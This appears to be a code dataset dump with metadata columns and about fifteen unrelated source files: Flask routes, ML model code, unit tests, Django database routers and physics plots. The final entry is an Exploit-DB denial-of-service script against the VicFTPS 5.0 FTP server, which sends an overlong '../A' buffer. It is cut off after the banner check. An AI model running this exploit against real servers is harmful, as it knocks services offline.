blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
01da5a0e86cd8ce29cbc5a202aa44f0231c8e8af
|
dc955cb940976e360853a03c8a18c173be21e406
|
/web_flask/3-python_route.py
|
080068cf4596ab06d921d340f2c4365846556cbe
|
[] |
no_license
|
SantiagoHerreG/AirBnB_clone_v2
|
888c04617d1f1e6ca01d080a57ae1932596a3a9a
|
2669d2455e657c1096d8f32c1d083fdb3d22665b
|
refs/heads/master
| 2020-11-25T05:24:36.767546
| 2020-01-23T04:20:59
| 2020-01-23T04:20:59
| 228,519,799
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
#!/usr/bin/python3
"""Uses the Flask micro framework to make an app server listen at 0.0.0.0:5000
"""
from flask import Flask
app = Flask(__name__)
@app.route('/', strict_slashes=False)
def home():
"""Function for handling the route /
"""
return "Hello HBNB!"
@app.route('/hbnb', strict_slashes=False)
def hbnb():
"""Handles /hbnb route
"""
return "HBNB"
@app.route('/c/<text>', strict_slashes=False)
def show_text(text=None):
"""Handles a request to route /c/<text>
"""
for letter in text:
if letter == "_":
letter = " "
return "C {}".format(text)
@app.route('/python/', strict_slashes=False)
@app.route('/python/<text>', strict_slashes=False)
def show_python(text="is_cool"):
"""Handles a request to route /python/(<text>)
"""
return "Python {}".format(text.replace("_", " "))
if __name__ == '__main__':
app.run(host='0.0.0.0', port='5000')
|
[
"888@holbertonschool.com"
] |
888@holbertonschool.com
|
f14bf2284a5ac68035d5cc581bed6b3963daf922
|
3c7dcf8c7af1536af8d6ff3b7ec4389e9523823a
|
/ssl_sale_ext/__manifest__.py
|
9d0dd99da365af6fa2c0a914e27283a768065fe9
|
[] |
no_license
|
tate11/module
|
cb70e8e45ecb9912a597ea9310c29baf9074fa90
|
b5148fad3f3a23df749d3d3d7278c2ce22e067d8
|
refs/heads/master
| 2020-03-18T21:11:18.403431
| 2017-06-14T07:48:48
| 2017-06-14T07:48:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
# -*- coding: utf-8 -*-
{
'name': 'SAL: SuperSilicone Sale Extention',
'version': '1.0',
'author': 'Kornelius K Macario (Falinwa Indonesia)',
'description': '''
Module to extend reporting file in Quotations.
''',
'depends': [
'ssl_base_ext',
],
'data': [
'report/ssl_sale_ext_report.xml',
'report/wishlist_report.xml',
'views/sale_view.xml',
'views/partner_view.xml',
'views/crm_lead_view.xml',
'views/wishlist_number.xml',
],
'css': [],
'js': [],
'installable': True,
'active': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
[
"dimansional@gmail.com"
] |
dimansional@gmail.com
|
94090cd146bdbb675c2a0236d33670dd56158a11
|
006341ca12525aa0979d6101600e78c4bd9532ab
|
/CMS/Zope-3.2.1/Dependencies/twisted-Zope-3.2.1/twisted/lore/__init__.py
|
142e9e5fcdd90fda4df2e11b44a9594c01d4c49d
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"ZPL-2.1",
"Python-2.0",
"ICU",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause",
"ZPL-2.0"
] |
permissive
|
germanfriday/code-examples-sandbox
|
d0f29e20a3eed1f8430d06441ac2d33bac5e4253
|
4c538584703754c956ca66392fdcecf0a0ca2314
|
refs/heads/main
| 2023-05-30T22:21:57.918503
| 2021-06-15T15:06:47
| 2021-06-15T15:06:47
| 377,200,448
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
#
'''
The Twisted Documentation Generation System
Maintainer: U{Andrew Bennetts<mailto:spiv@twistedmatrix.com>}
'''
# TODO
# Abstract
# Bibliography
# Index
# Allow non-web image formats (EPS, specifically)
# Allow pickle output and input to minimize parses
# Numbered headers
# Navigational aides
__version__ = 'SVN-Trunk'
|
[
"chris@thegermanfriday.com"
] |
chris@thegermanfriday.com
|
c99df2302f718da619b9117303bad092b189a97e
|
170864b6ec66be48138f231fe8ac3381481b8c9d
|
/python/BOJ_15652.py
|
20c6e031ade32221e23ea0305ac743f403e37932
|
[] |
no_license
|
hyesungoh/AA_Algorithm
|
5da3d8312d035d324dfaa31eef73f01a238231f3
|
d68f52eaa29cfc4656a8b5623359166779ded06e
|
refs/heads/master
| 2023-06-09T14:49:01.402456
| 2021-06-28T10:10:09
| 2021-06-28T10:10:09
| 272,701,231
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 286
|
py
|
n, m = map(int, input().split())
l = list(range(1, n+1))
ans = []
def bt(depth, index):
if depth == m:
print(*ans)
return
for i in range(n):
if l[i] >= index:
ans.append(l[i])
bt(depth + 1, l[i])
ans.pop()
bt(0, 0)
|
[
"haesungoh414@gmail.com"
] |
haesungoh414@gmail.com
|
a63e804d240377f401fed52279ef157ad6bf2aa1
|
6bf036d64271bb062451626c334b6eabaf2bcef9
|
/tensorflow_asr/models/ctc/ctc.py
|
d7dcf5dd5e414338abc25104ccc39efad21dc96b
|
[
"Apache-2.0"
] |
permissive
|
lamyiowce/TensorFlowASR
|
7ce9d96f70da182e7d058a492993b62d523354e5
|
130124ccaf23fabe3e7a6f138d9403a7c0946ef3
|
refs/heads/main
| 2023-06-25T03:09:28.182924
| 2021-06-10T13:42:45
| 2021-06-10T13:42:45
| 390,671,234
| 0
| 0
|
Apache-2.0
| 2021-07-29T09:29:18
| 2021-07-29T09:29:18
| null |
UTF-8
|
Python
| false
| false
| 7,347
|
py
|
# Copyright 2020 Huy Le Nguyen (@usimarit)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict, Union
import numpy as np
import tensorflow as tf
from ..base_model import BaseModel
from ...featurizers.speech_featurizers import TFSpeechFeaturizer
from ...featurizers.text_featurizers import TextFeaturizer
from ...utils import math_util, shape_util, data_util
from ...losses.ctc_loss import CtcLoss
class CtcModel(BaseModel):
def __init__(self,
encoder: tf.keras.Model,
decoder: Union[tf.keras.Model, tf.keras.layers.Layer] = None,
vocabulary_size: int = None,
**kwargs):
super().__init__(**kwargs)
self.encoder = encoder
if decoder is None:
assert vocabulary_size is not None, "vocabulary_size must be set"
self.decoder = tf.keras.layers.Dense(units=vocabulary_size, name=f"{self.name}_logits")
else:
self.decoder = decoder
self.time_reduction_factor = 1
def make(self, input_shape, batch_size=None):
inputs = tf.keras.Input(input_shape, batch_size=batch_size, dtype=tf.float32)
inputs_length = tf.keras.Input(shape=[], batch_size=batch_size, dtype=tf.int32)
self(
data_util.create_inputs(
inputs=inputs,
inputs_length=inputs_length
),
training=False
)
def compile(self,
optimizer,
global_batch_size,
blank=0,
run_eagerly=None,
**kwargs):
loss = CtcLoss(blank=blank, global_batch_size=global_batch_size)
super().compile(loss=loss, optimizer=optimizer, run_eagerly=run_eagerly, **kwargs)
def add_featurizers(self,
speech_featurizer: TFSpeechFeaturizer,
text_featurizer: TextFeaturizer):
self.speech_featurizer = speech_featurizer
self.text_featurizer = text_featurizer
def call(self, inputs, training=False, **kwargs):
logits = self.encoder(inputs["inputs"], training=training, **kwargs)
logits = self.decoder(logits, training=training, **kwargs)
return data_util.create_logits(
logits=logits,
logits_length=math_util.get_reduced_length(inputs["inputs_length"], self.time_reduction_factor)
)
# -------------------------------- GREEDY -------------------------------------
@tf.function
def recognize(self, inputs: Dict[str, tf.Tensor]):
logits = self(inputs, training=False)
probs = tf.nn.softmax(logits["logits"])
def map_fn(prob): return tf.numpy_function(self._perform_greedy, inp=[prob], Tout=tf.string)
return tf.map_fn(map_fn, probs, fn_output_signature=tf.TensorSpec([], dtype=tf.string))
def _perform_greedy(self, probs: np.ndarray):
from ctc_decoders import ctc_greedy_decoder
decoded = ctc_greedy_decoder(probs, vocabulary=self.text_featurizer.non_blank_tokens)
return tf.convert_to_tensor(decoded, dtype=tf.string)
def recognize_tflite(self, signal):
"""
Function to convert to tflite using greedy decoding
Args:
signal: tf.Tensor with shape [None] indicating a single audio signal
Return:
transcript: tf.Tensor of Unicode Code Points with shape [None] and dtype tf.int32
"""
features = self.speech_featurizer.tf_extract(signal)
features = tf.expand_dims(features, axis=0)
input_length = shape_util.shape_list(features)[1]
input_length = math_util.get_reduced_length(input_length, self.time_reduction_factor)
input_length = tf.expand_dims(input_length, axis=0)
logits = self.encoder(features, training=False)
logits = self.decoder(logits, training=False)
probs = tf.nn.softmax(logits)
decoded = tf.keras.backend.ctc_decode(
y_pred=probs, input_length=input_length, greedy=True
)
decoded = tf.cast(decoded[0][0][0], dtype=tf.int32)
transcript = self.text_featurizer.indices2upoints(decoded)
return transcript
# -------------------------------- BEAM SEARCH -------------------------------------
@tf.function
def recognize_beam(self, inputs: Dict[str, tf.Tensor], lm: bool = False):
logits = self(inputs, training=False)
probs = tf.nn.softmax(logits["logits"])
def map_fn(prob): return tf.numpy_function(self._perform_beam_search, inp=[prob, lm], Tout=tf.string)
return tf.map_fn(map_fn, probs, dtype=tf.string)
def _perform_beam_search(self, probs: np.ndarray, lm: bool = False):
from ctc_decoders import ctc_beam_search_decoder
decoded = ctc_beam_search_decoder(
probs_seq=probs,
vocabulary=self.text_featurizer.non_blank_tokens,
beam_size=self.text_featurizer.decoder_config.beam_width,
ext_scoring_func=self.text_featurizer.scorer if lm else None
)
decoded = decoded[0][-1]
return tf.convert_to_tensor(decoded, dtype=tf.string)
def recognize_beam_tflite(self, signal):
"""
Function to convert to tflite using beam search decoding
Args:
signal: tf.Tensor with shape [None] indicating a single audio signal
Return:
transcript: tf.Tensor of Unicode Code Points with shape [None] and dtype tf.int32
"""
features = self.speech_featurizer.tf_extract(signal)
features = tf.expand_dims(features, axis=0)
input_length = shape_util.shape_list(features)[1]
input_length = math_util.get_reduced_length(input_length, self.time_reduction_factor)
input_length = tf.expand_dims(input_length, axis=0)
logits = self.encoder(features, training=False)
logits = self.decoder(logits, training=False)
probs = tf.nn.softmax(logits)
decoded = tf.keras.backend.ctc_decode(
y_pred=probs, input_length=input_length, greedy=False,
beam_width=self.text_featurizer.decoder_config.beam_width
)
decoded = tf.cast(decoded[0][0][0], dtype=tf.int32)
transcript = self.text_featurizer.indices2upoints(decoded)
return transcript
# -------------------------------- TFLITE -------------------------------------
def make_tflite_function(self, greedy: bool = False):
if greedy:
return tf.function(
self.recognize_tflite,
input_signature=[
tf.TensorSpec([None], dtype=tf.float32)
]
)
return tf.function(
self.recognize_beam_tflite,
input_signature=[
tf.TensorSpec([None], dtype=tf.float32)
]
)
|
[
"nlhuy.cs.16@gmail.com"
] |
nlhuy.cs.16@gmail.com
|
a277d33f5860071faa32fa667b73c549508cf86b
|
6d7e28fd178d5eba1b9e67dd77ad7cec6690743b
|
/alg_dataset.py
|
0a37bab5931b6a82ad462e82449e0347cb2d479e
|
[] |
no_license
|
Arseni1919/PL_TEMPLATE_PROJECT
|
ec83f8402996f837cbaccbea092c5cc523a959de
|
dd5d5fa2284c9ea1da35e316a14299fc89272669
|
refs/heads/main
| 2023-02-12T18:56:42.810589
| 2021-01-12T09:54:50
| 2021-01-12T09:54:50
| 326,060,903
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
from CONSTANTS import *
class ALGDataset(Dataset):
def __init__(self):
self.buffer = deque(maxlen=REPLAY_SIZE)
def __len__(self):
return len(self.buffer)
def __getitem__(self, indx):
item = self.buffer[indx]
return item.state, item.action, item.reward, item.done, item.new_state
def append(self, experience):
self.buffer.append(experience)
|
[
"1919ars@gmail.com"
] |
1919ars@gmail.com
|
da1c36a4a8b25e9de600154f608421c9cf4a03fb
|
60eb288f242b60b872481dc1f38848c19cd51452
|
/tests/conftest.py
|
6dcddd7abf84dc136e6f1f1f1ff6b0879c50e873
|
[
"MIT"
] |
permissive
|
klen/muffin-admin
|
62654a515f552b9026a27afc70c3e1b98cbb6f04
|
3c7c2e169911bf5388947447cfc693648decd7cb
|
refs/heads/develop
| 2023-08-30T16:46:28.750256
| 2023-08-24T09:25:16
| 2023-08-24T09:25:16
| 34,291,282
| 19
| 2
|
MIT
| 2023-02-20T20:25:44
| 2015-04-20T23:04:00
|
Python
|
UTF-8
|
Python
| false
| false
| 650
|
py
|
from pathlib import Path
import pytest
from muffin import Application, TestClient
@pytest.fixture(
params=["trio", "curio", pytest.param(("asyncio", {"use_uvloop": False}), id="asyncio")]
)
def aiolib(request):
return request.param
@pytest.fixture(scope="session", autouse=True)
def prebuild_js():
import muffin_admin
main_js = Path(muffin_admin.__file__).parent.parent / "muffin_admin/main.js"
main_js.write_text("console.log('muffin-admin js files');")
yield main_js
main_js.unlink()
@pytest.fixture()
def app():
return Application(debug=True)
@pytest.fixture()
def client(app):
return TestClient(app)
|
[
"horneds@gmail.com"
] |
horneds@gmail.com
|
116cac7e4362884c75a97caf04c8c453116a0d80
|
fb7efe44f4d9f30d623f880d0eb620f3a81f0fbd
|
/components/policy/tools/template_writers/writers/android_policy_writer_unittest.py
|
6eb7a2f630701bdced109080db050ec1ed51ebb2
|
[
"BSD-3-Clause"
] |
permissive
|
wzyy2/chromium-browser
|
2644b0daf58f8b3caee8a6c09a2b448b2dfe059c
|
eb905f00a0f7e141e8d6c89be8fb26192a88c4b7
|
refs/heads/master
| 2022-11-23T20:25:08.120045
| 2018-01-16T06:41:26
| 2018-01-16T06:41:26
| 117,618,467
| 3
| 2
|
BSD-3-Clause
| 2022-11-20T22:03:57
| 2018-01-16T02:09:10
| null |
UTF-8
|
Python
| false
| false
| 2,684
|
py
|
#!/usr/bin/env python
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for writers.android_policy_writer'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../..'))
import unittest
from xml.dom import minidom
from writers import writer_unittest_common
from writers import android_policy_writer
class AndroidPolicyWriterUnittest(writer_unittest_common.WriterUnittestCommon):
'''Unit tests to test assumptions in Android Policy Writer'''
def testPolicyWithoutItems(self):
# Test an example policy without items.
policy = {
'name': '_policy_name',
'caption': '_policy_caption',
'desc': 'This is a long policy caption. More than one sentence '
'in a single line because it is very important.\n'
'Second line, also important'
}
writer = android_policy_writer.GetWriter({})
writer.Init()
writer.BeginTemplate()
writer.WritePolicy(policy)
self.assertEquals(
writer._resources.toxml(),
'<resources>'
'<string name="_policy_nameTitle">_policy_caption</string>'
'<string name="_policy_nameDesc">This is a long policy caption. More '
'than one sentence in a single line because it is very '
'important.\nSecond line, also important'
'</string>'
'</resources>')
def testPolicyWithItems(self):
# Test an example policy without items.
policy = {
'name': '_policy_name',
'caption': '_policy_caption',
'desc': '_policy_desc_first.\nadditional line',
'items': [
{
'caption':'_caption1',
'value':'_value1',
},
{
'caption':'_caption2',
'value':'_value2',
}
]
}
writer = android_policy_writer.GetWriter({})
writer.Init()
writer.BeginTemplate()
writer.WritePolicy(policy)
self.assertEquals(
writer._resources.toxml(),
'<resources>'
'<string name="_policy_nameTitle">_policy_caption</string>'
'<string name="_policy_nameDesc">_policy_desc_first.\n'
'additional line</string>'
'<string-array name="_policy_nameEntries">'
'<item>_caption1</item>'
'<item>_caption2</item>'
'</string-array>'
'<string-array name="_policy_nameValues">'
'<item>_value1</item>'
'<item>_value2</item>'
'</string-array>'
'</resources>')
if __name__ == '__main__':
unittest.main()
|
[
"jacob-chen@iotwrt.com"
] |
jacob-chen@iotwrt.com
|
e4eb19c2ffe6437ac4bd088a7d184763cd6d81a6
|
198f759dc334df0431cbc25ed4243e86b93571eb
|
/database_routers/mssql_router.py
|
d5bc32937be3d699277bc992a68a97f54e34657c
|
[] |
no_license
|
miladhzz/django-muliple-db
|
ec2074b14dd67a547c982f20b2586f435e7e0d6c
|
56ff2555e498d9105cad215daf4c3d4da59d7d9a
|
refs/heads/master
| 2022-12-25T08:08:05.761226
| 2020-10-06T06:38:30
| 2020-10-06T06:38:30
| 301,636,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 583
|
py
|
class MssqlRouter:
route_app_labels = {'mssql',}
def db_for_read(self, model, **hints):
return 'mssql'
def db_for_write(self, model, **hints):
return 'mssql'
def allow_relation(self, obj1, obj2, **hints):
if (
obj1._meta.app_label in self.route_app_labels or
obj2._meta.app_label in self.route_app_labels
):
return True
return None
def allow_migrate(self, db, app_label, model_name=None, **hints):
"""
All non-auth models end up in this pool.
"""
return True
|
[
"miladhzz@gmail.com"
] |
miladhzz@gmail.com
|
c27d90b99c370731bf6398c8f1b7c9d70f7b4c7e
|
d0fec74acfbfdee1b662736731c1cc988e2ba2ee
|
/problem_40/p040.py
|
21c164577ea7c7bd2acc43fe9bacc1d482b5a2b1
|
[] |
no_license
|
msztylko/project-Euler
|
fdd0cfefbe88b63f6dbd2d08f1cd59270b9e1735
|
b3f5ce828ccc6662c100dd27fa295fc8afa22f6e
|
refs/heads/master
| 2021-11-23T02:50:19.333259
| 2021-10-31T17:52:28
| 2021-10-31T17:52:28
| 195,980,596
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 271
|
py
|
import sys
if sys.version_info.major == 2:
range = xrange
def compute():
s = "".join(str(i) for i in range(1, 1000000))
ans = 1
for i in range(7):
ans *= int(s[10 ** i - 1])
return str(ans)
if __name__ == "__main__":
print(compute())
|
[
"marcin.sztylko@gmail.com"
] |
marcin.sztylko@gmail.com
|
68653bc8d29f3dcdda99954fd2c56c4db08be014
|
2020c9c6958d9cc338b72f62e24d9ad30c1a8cad
|
/python/0048.rotate-image/rotate-image.py
|
ebc9d290238139686bdea8148f5026ac7910bff1
|
[] |
no_license
|
ysmintor/leetcode
|
b2d87db932b77e72504ffa07d7bf1b0d8c09b661
|
434889037fe3e405a8cbc71cd822eb1bda9aa606
|
refs/heads/master
| 2020-05-30T21:03:03.886279
| 2019-10-31T08:46:23
| 2019-10-31T09:02:24
| 189,963,050
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
class Solution:
def rotate(self, matrix: List[List[int]]) -> None:
"""
Do not return anything, modify matrix in-place instead.
"""
# 一共有3种处理办法,每一次都有巧妙,时间多将三个都看会
n = len(matrix)
for i in range(n):
for j in range(i+1, n):
matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]
for row in range(n):
matrix[row].reverse()
|
[
"ysmintor@gmail.com"
] |
ysmintor@gmail.com
|
48050f4660f52648eea4935b898f348604a3dd8d
|
82ef9a0dd1618a28770597227acfc0150b948af2
|
/wearnow/gui/editors/displaytabs/notebackreflist.py
|
08022d00f1eb026cafa2cb4ba841b487ad4196ea
|
[] |
no_license
|
bmcage/wearnow
|
ef32a7848472e79e56763b38551835aa97864b21
|
c8dfa75e1ea32b0c021d71c4f366ab47104c207e
|
refs/heads/master
| 2021-01-16T00:27:59.597812
| 2016-01-19T11:55:03
| 2016-01-19T11:55:03
| 37,195,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,354
|
py
|
#
# WearNow - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# WearNow classes
#
#-------------------------------------------------------------------------
from .backrefmodel import BackRefModel
from .backreflist import BackRefList
class NoteBackRefList(BackRefList):
def __init__(self, dbstate, uistate, track, obj, callback=None):
BackRefList.__init__(self, dbstate, uistate, track, obj,
BackRefModel, callback=callback)
def get_icon_name(self):
return 'wearnow-notes'
|
[
"benny.malengier@gmail.com"
] |
benny.malengier@gmail.com
|
dc20d47c77e072ae91e749eeca8edf20f26f99a1
|
4f7aa44d21ae38093869e79e10f5cdc8842d48b7
|
/05-mylibrary-lab-next/presentation/app_main_window.py
|
8979bca4b7ccccd07d557f3862a560c0266e63e2
|
[
"Apache-2.0"
] |
permissive
|
iproduct/intro-python
|
31e802c2c21a4df3361656f12d267ec52c2d6564
|
7e08e144da2907fcf45dc734ab4e896631625d75
|
refs/heads/master
| 2023-02-19T11:42:37.522624
| 2023-02-13T15:54:03
| 2023-02-13T15:54:03
| 128,980,155
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,198
|
py
|
from tkinter import *
from tkinter import ttk, messagebox
from dao.book_repository_json import BookRepositoryJson
from presentation.add_edit_book_dialog import AddEditBookDialog
from utils.tkinter_utils import print_hierarchy, get_ceter_window_left_top
MAIN_WIDTH = 800
MAIN_HEIGHT = 600
class AppMainWindow(ttk.Frame):
def __init__(self, root, application):
super().__init__(root, padding="3 3 12 12")
self.application = application
root.title("My Library")
print(f"Windowing system: {root.tk.call('tk', 'windowingsystem')}") # return x11, win32, aqua
root.option_add('*tearOff', FALSE) # remove menu tear off ability
left, top = get_ceter_window_left_top(root, MAIN_WIDTH, MAIN_HEIGHT)
root.geometry(f"{MAIN_WIDTH}x{MAIN_HEIGHT}+{left}+{top}")
self.grid(column=0, row=0, sticky=(N, W, E, S) )
self.menubar = Menu(root)
root['menu'] = self.menubar
# File menu
menu_file = Menu(self.menubar)
self.menubar.add_cascade(menu=menu_file, label="File", underline=0)
menu_file.add_command(label='New', command = self.newFile, underline=0, accelerator="Control+Shift+N")
self.bind_all("<Control-Shift-KeyPress-N>", self.newFile)
print("!!!", menu_file.entryconfigure(0))
menu_file.add_command(label="Open ...", command = self.openFile)
menu_file.add_command(label='Close', command = self.closeFile)
menu_file.entryconfigure('Close', state=DISABLED)
# Books menu
menu_books = Menu(self.menubar)
self.menubar.add_cascade(menu=menu_books, label="Books", underline=0)
menu_books.add_command(label='Add New Book', command=self.application.show_add_book, underline=2)
menu_books.add_command(label='Browse Books', command=self.application.browseBooks())
def newFile(self, event = None):
messagebox.showinfo(title="New File Dialog", message="Creating DB file ...")
def openFile(self):
messagebox.showinfo(title="File Open Dialog", message="Opening DB file ...")
def closeFile(self):
messagebox.showinfo(title="File Close Dialog", message="Closing DB file ...")
|
[
"office@iproduct.org"
] |
office@iproduct.org
|
0c33ff75f22af311c81bd6cebc6adb11379e4481
|
7124a12aee78af2cf3cdd5adbe38debd07fda07b
|
/Simulaciones/Proyecto_4_2/Scripts/Potencial_Graphics.py
|
3da508c74cc29aebc52f670a7ed4bf17cbdb5dd2
|
[] |
no_license
|
giovannilopez9808/Notas_Agosto_2020
|
e52ac9dd150037d0a8981fb765bcf0a7e73ed04b
|
5fc8d5baabbe9ed5f3ee1b33c59e7ae4e5aff526
|
refs/heads/master
| 2023-02-01T07:50:38.559046
| 2020-12-14T05:18:34
| 2020-12-14T05:18:34
| 293,427,083
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,990
|
py
|
import numpy as np
import matplotlib.pyplot as plt
#<-----------------------------Potencial--------------------->
def potential_lj(r,e,sigma):
v=4*e*((sigma/r)**12-(sigma/r)**6)
return v
#<----------------------------Fuerza--------------------->
def force_lj(r,e,sigma):
f=4*e*(12*sigma**12/r**13-6*sigma**6/r**7)
return f
#
def potencial_fene(r,e,ra):
k=10*e
v=-k*ra**2*np.log(1-(r/ra)**2)/2
return v
#
def force_fene(r,e,ra):
k=10*e
f=k*r/((1-(r/ra)**2))
return f
#
def graphic(r,sum,lj,fene,ylim,label,name):
#<----------------------------Direcciones de los archivos-------------------->
dir_graphics="../Graphics/"
plt.xlim(r[0],1.3);plt.ylim(-5,ylim)
plt.plot(r,sum,lw=3,color="#7400b8",label=label+"$(r)$")
plt.plot(r,lj,lw=3,color="#5390d9",label=label+"$_{LJ}$",ls="--")
plt.plot(r,fene,lw=3,color="#64dfdf",label=label+"$_{FENE}$",ls="--")
plt.ylabel(label+"(r)");plt.xlabel("Distancia radial (r)")
plt.legend(frameon=False,ncol=1,loc="upper center",fontsize=12)
plt.subplots_adjust(left=0.121,bottom=0.11,right=0.924,top=0.943)
plt.savefig(dir_graphics+name+".png")
plt.clf()
#<------------------------Parametros-------------------->
sigma=1;e=1;ra=1.3
#<------------------------------Valores para el radio---------------------->
r=np.arange(0.8,1.29+0.01,0.01);n=np.size(r)
v=np.zeros(np.size(r));v_lj=np.zeros(np.size(r));v_fene=np.zeros(np.size(r))
f=np.zeros(np.size(r));f_lj=np.zeros(np.size(r));f_fene=np.zeros(np.size(r))
#<----------------------------Potencial-------------------->
for i in range(n):
r_i=r[i]
if r_i<2.5:
v_lj[i]+=potential_lj(r_i,e,sigma)
f_lj[i]+=force_lj(r_i,e,sigma)
if r_i<ra:
v_fene[i]+=potencial_fene(r_i,e,ra)
f_fene[i]+=force_fene(r_i,e,ra)
v=v_lj+v_fene
f=f_lj+f_fene
graphic(r,v,v_lj,v_fene,30,"V","potential")
graphic(r,f,f_lj,f_fene,150,"F","force")
|
[
"giovannilopez9808@gmail.com"
] |
giovannilopez9808@gmail.com
|
edcd5818de24ad48b4dd91248306c61d7ac34f7b
|
44b6bc41fe8e424196f98dbc5b2f050c1f9645f8
|
/platforms/windows/dos/16230.py
|
e8600ad68d652ef330e3daac086438f90ca632dd
|
[] |
no_license
|
angeloobeta/exploit-database
|
21283dd8549f47836a35af6f3ea7b63b8dba11ea
|
43f3d9e94c01a7f51e30561a96214af231dd9d36
|
refs/heads/master
| 2021-08-08T21:07:38.794539
| 2017-11-11T05:01:28
| 2017-11-11T05:01:28
| 110,380,452
| 0
| 1
| null | 2017-11-11T21:09:05
| 2017-11-11T21:09:04
| null |
UTF-8
|
Python
| false
| false
| 3,696
|
py
|
#!/usr/bin/python
#
#
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxxxx xxx xxx xxx xxx xxx xxx xxxxxx
# xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx
#
#
#[+]Exploit Title: Exploit Denial of Service VicFTPS
#[+]Date: 02\24\11
#[+]Author C4SS!0 G0M3S
#[+]Software Link: http://vicftps.50webs.com/VicFTPS-5.0-bin.zip
#[+]Version: 5.0
#[+]Tested On: WIN-XP SP3
#[+]CVE: N/A
#[+]Language: Portuguese
#
#
#Author C4SS!0 G0M3S || Cassio Gomes
#E-mail Louredo_@hotmail.com
#Site www.x000.org/
#
#
import socket
import time
import os
import sys
if os.name == 'nt':
os.system("cls")#SE FOR WINDOWS
os.system("color 4f")
else:
os.system("clear")#SE FOR LINUX
def usage():
print """
============================================================
============================================================
===============Exploit Denial of Service Vicftps 5.0========
===============Autor C4SS!0 G0M3S || C\xe1ssio Gomes==========
===============E-mail Louredo_@hotmail.com==================
===============Site www.x000.org/===========================
============================================================
============================================================
"""
if len(sys.argv)!=3:
usage()
print "\t\t[-]Modo de Uso: python %s <Host> <Porta>" % sys.argv[0]
print "\t\t[-]Exemplo: python %s 192.168.1.2 21" % sys.argv[0]
sys.exit(0)
buf = "../A" * (330/4)
usage()
print "\t\t[+]Conectando-se Ao Servidor %s\n" % sys.argv[1]
time.sleep(1)
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print "\t\t[+]Checando se o Servidor e Vulneravel\n"
time.sleep(1)
banner = s.recv(2000)
if((banner.find("VicFTPS"))!=-1):
